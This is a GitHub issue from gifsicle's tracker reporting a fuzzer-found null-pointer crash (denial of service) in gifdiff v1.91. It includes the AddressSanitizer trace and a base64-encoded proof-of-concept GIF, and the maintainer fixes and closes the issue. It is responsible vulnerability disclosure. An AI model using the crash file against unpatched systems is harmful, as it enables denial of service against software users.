Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

null dereference in apply_image #130

Closed
nrathaus opened this issue Apr 8, 2018 · 5 comments
Closed

null dereference in apply_image #130

nrathaus opened this issue Apr 8, 2018 · 5 comments

Comments

@nrathaus
Copy link

@nrathaus nrathaus commented Apr 8, 2018

This was discovered by: dorkerdevil dorkerdevil@protonmail.com - which asked us to report it to you

There is a null dereference Vulnerability(Denial of service) affecting gifdiff in gifsicle v1.91
screenshot and poc file is attached.

Note: @@ refers to poc file which is attached, and that poc file is used twice which means the same poc file will be on both place.

`PoC:~
:~/gifsicle-asan/src/gifdiffout/crashes# ../../gifdiff -w -B @@ @@
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #0:
gifdiff: error: unknown block type 102 at file offset 13
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #1:
gifdiff: error: bad graphic extension
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #0:
gifdiff: error: unknown block type 102 at file offset 13
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #1:
gifdiff: error: bad graphic extension
ASAN:SIGSEGV

==21423==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004450f8 bp 0x0c18000017f4 sp 0x7fff9f1b44b0 T0)
#0 0x4450f7 in apply_image /root/geeknik/gifsicle-asan/src/gifdiff.c:121
#1 0x44ab8d in compare /root/geeknik/gifsicle-asan/src/gifdiff.c:316
#2 0x40246b in main /root/geeknik/gifsicle-asan/src/gifdiff.c:625
#3 0x7f7821e2382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#4 0x4027f8 in _start (/root/geeknik/gifsicle-asan/src/gifdiff+0x4027f8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/geeknik/gifsicle-asan/src/gifdiff.c:121 apply_image
==21423==ABORTING`

@nrathaus
Copy link
Author

@nrathaus nrathaus commented Apr 8, 2018

File
id 3a000022sig 3a06src 3a000000op 3ahavocrep 3a4

Base64 encoded file
R0lGODlhIAAgABMBAGbMzP///wAAADOZZpn/zAAAAAAAAAAAACH5BAAAAAAALAAAAAAgACAAAAOLGLrc/miqpk7ISau9S5DNu/8fICgaYJ5oqqbDGJRrLAMtScw468J5Xr+3nm8XFM5+PGMMWYwxcMyZ40iULQaDhSzqDGBNisGyuhUDrmNb72pWcaXhtmiqppsM/27pVi8UX96rcQpDf3V+QD12d4NKK2+Lc4qOKI2RJ5OUNHz///8AAAAzmWaZ/8wAAAAAAAAAAAAh+QQAAAAAl0g0WJ2en6CgLi8XpaYTEKmqDwkAOw==

@kohler kohler closed this as completed in e2d5c01 Apr 8, 2018
@kohler
Copy link
Owner

@kohler kohler commented Apr 8, 2018

Thanks for the report!

@nrathaus
Copy link
Author

@nrathaus nrathaus commented Aug 12, 2018

Has this been resolved?

@kohler
Copy link
Owner

@kohler kohler commented Aug 12, 2018

yes. that is why i closed the issue with a commit reference.

@nrathaus
Copy link
Author

@nrathaus nrathaus commented Aug 13, 2018

Ok, thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants